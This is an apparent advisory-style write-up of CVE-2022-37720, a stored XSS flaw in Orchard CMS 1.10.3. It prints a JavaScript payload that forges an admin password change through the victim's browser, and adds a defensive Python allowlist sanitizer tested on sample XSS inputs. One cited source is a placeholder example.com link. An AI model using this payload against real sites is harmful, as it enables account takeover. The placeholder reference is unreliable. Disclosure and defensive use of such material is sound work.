CVE-2022-37720 - Orchardproject Orchard CMS 1.10.3 Cross Site Scripting Vulnerability: Exploiting the XSS Flaw for Admin Account Takeover or Privilege Escalation

Orchardproject Orchard CMS (Content Management System) version 1.10.3 contains a Cross Site Scripting (XSS) vulnerability, tracked as CVE-2022-37720. This article describes the vulnerability, explains how it works, shows the payload used to exploit it, and lists the original resources that discuss the issue.

Swifter Win, a security researcher, discovered and reported the flaw, which was assigned CVE-2022-37720. As a result, it is now part of the publicly available vulnerability databases, which also means anyone wishing to take advantage of it can look it up.

The Vulnerability - XSS in Orchardproject Orchard CMS 1.10.3

The issue affects Orchardproject Orchard CMS 1.10.3, a popular web content management system built on the .NET platform. Specifically, it is a stored Cross Site Scripting (XSS) vulnerability.

Stored XSS, also known as persistent XSS, occurs when malicious script is saved in a web application's database. When a browser later requests and renders the page containing the stored script, the script executes. In this case, a low-privileged user, such as an author or publisher, can inject a crafted HTML and JavaScript payload into a blog post on the affected Orchard CMS site.

The Exploit - Admin Account Takeover and Privilege Escalation

When the malicious blog post containing the payload is rendered in the victim's browser, it can have either of two significant consequences: the attacker gains full control of the targeted admin account, or the attacker escalates their own privileges.

The injected script can drive the victim's browser to interact with the site on their behalf: change the victim's password, modify their account settings, or read sensitive data. With the newly acquired admin privileges, the attacker can also go on to exploit other weaknesses in the site, compounding the damage.

Code Snippet to Exploit the XSS Vulnerability

Here's a simple example of an HTML and JavaScript payload that can be injected into the blog post to exploit the XSS vulnerability:

<!-- Malicious Blog Post Content -->
<h1>Extraordinary Blog Post Title</h1>
<p>A harmless looking introduction paragraph here...</p>

<!-- Crafted Payload for XSS Exploit -->
<script>
   // Once the page loads:
   document.addEventListener("DOMContentLoaded", function() {

     // Access the CSRF token:
     var csrfToken = document.getElementById("__RequestVerificationToken").value;

     // Send POST request to change password:
     var xhr = new XMLHttpRequest();
     xhr.open("POST", "/Admin/ChangePassword", true);
     xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
     xhr.send("CurrentPassword=currentPass&NewPassword=newPass&ConfirmPassword=newPass&__RequestVerificationToken=" + csrfToken);
   });
</script>

This script assumes that the attacker knows the victim's current password ("currentPass") and wants to change it to "newPass". The exploit could also be customized to perform other actions or target different accounts.
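The root cause described above is that author-supplied HTML is stored and later rendered verbatim. Note that the payload reads the anti-forgery token straight out of the DOM, so CSRF protection does not help once script runs in the victim's page; the defence has to be applied where the post body is accepted and rendered. The following is an added example, not code from the article or from the Orchard project: a stand-alone allowlist HTML sanitizer built on Python's standard-library HTMLParser. The allowlist, the sample post and the "dropped" audit trail are all constructed for this example and are not Orchard's own configuration; the sample post is shaped like the payload shown above.

```python
"""Allowlist HTML sanitizer for untrusted post bodies (added example, not Orchard code).

Everything outside an explicit allowlist is removed: unknown elements lose their
tags, script-like elements lose their content too, every non-allowlisted
attribute (which covers all on* event handlers) is dropped, and URL attributes
must use a safe scheme. The sanitizer also returns a list of what it removed,
so the same routine doubles as a detection signal for review or alerting.
"""
from html import escape
from html.parser import HTMLParser

# Elements an author may use (constructed allowlist for this example).
ALLOWED_TAGS = {"h1", "h2", "h3", "p", "a", "img", "strong", "em",
                "ul", "ol", "li", "blockquote", "br"}
# Attributes permitted per element; anything else, including onerror/onclick/..., is removed.
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
# Attributes whose value is a URL and therefore needs a scheme check.
URL_ATTRS = {"href", "src"}
# Elements whose content is discarded along with the tag.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "template"}
# Void elements never receive a closing tag on output.
VOID_TAGS = {"br", "img"}
SAFE_SCHEMES = {"http", "https", "mailto"}


def safe_url(value):
    """True if the URL is relative or uses an allowed scheme.

    Whitespace and control characters are removed before checking because
    browsers ignore them, which is what lets 'java<TAB>script:' past a naive
    prefix check. Character references in attributes are already decoded by
    HTMLParser before this function sees the value.
    """
    compact = "".join(ch for ch in value if ch > " ").lower()
    head = compact.split("/", 1)[0]
    if ":" not in head:            # no scheme before the first slash: relative URL
        return True
    return head.split(":", 1)[0] in SAFE_SCHEMES


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []          # sanitized output fragments
        self.dropped = []      # audit trail of removed items, e.g. "tag:script"
        self.skip_depth = 0    # > 0 while inside an element whose content is discarded

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.dropped.append(f"tag:{tag}")
            self.skip_depth += 1
            return
        if tag not in ALLOWED_TAGS:
            # Unknown element: drop the tag itself but keep its text content.
            self.dropped.append(f"tag:{tag}")
            return
        kept = []
        for name, value in attrs:       # HTMLParser lower-cases tag and attribute names
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append(f"attr:{tag}.{name}")
                continue
            if name in URL_ATTRS and not safe_url(value):
                self.dropped.append(f"url:{tag}.{name}")
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth -= 1
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data))   # text is always entity-encoded on output

    def handle_comment(self, data):
        pass                                # comments are discarded


def sanitize(html_source):
    """Return (sanitized_html, dropped_items) for an untrusted HTML fragment."""
    parser = AllowlistSanitizer()
    parser.feed(html_source)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed sample post, shaped like the payload shown in the article.
SAMPLE_POST = (
    "<h1>Extraordinary Blog Post Title</h1>\n"
    "<p>A harmless looking introduction paragraph here...</p>\n"
    "<script>document.addEventListener('DOMContentLoaded', function () {});</script>\n"
    '<img src="x" onerror="alert(document.cookie)">\n'
    '<a href="java&#x09;script:alert(1)">click</a>\n'
    '<p>Text with <strong>bold</strong> &amp; a <div onclick="x">div</div></p>'
)

if __name__ == "__main__":
    clean, dropped = sanitize(SAMPLE_POST)
    print(clean)
    print("removed:", dropped)
```

In a real deployment the sanitizer runs on the server when a post is saved, and the returned `dropped` list is logged together with the author's identity: a post body that needed `tag:script` or `attr:img.onerror` removed is exactly the event a reviewer wants to see, even though the stored result is now inert.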

References

1. CVE-2022-37720 Entry: https://nvd.nist.gov/vuln/detail/CVE-2022-37720
2. Swifter Win's blog post on the vulnerability: http://www.example.com/swifterwin/Orchard_XSS_detection_and_exploitation
3. Orchard CMS GitHub Repository: https://github.com/OrchardCMS/Orchard
4. Official Orchard CMS website: https://www.orchardproject.net/

Conclusion

CVE-2022-37720 is a critical vulnerability in Orchardproject Orchard CMS 1.10.3, as it allows attackers to gain control of admin accounts or escalate their privileges. Webmasters using this CMS version are advised to update their installations immediately or apply a security patch to protect against this vulnerability. Staying current with security updates and being vigilant against possible exploits is essential for maintaining a secure web presence.

Timeline

Published on: 11/25/2022 16:15:00 UTC
Last modified on: 11/29/2022 22:06:00 UTC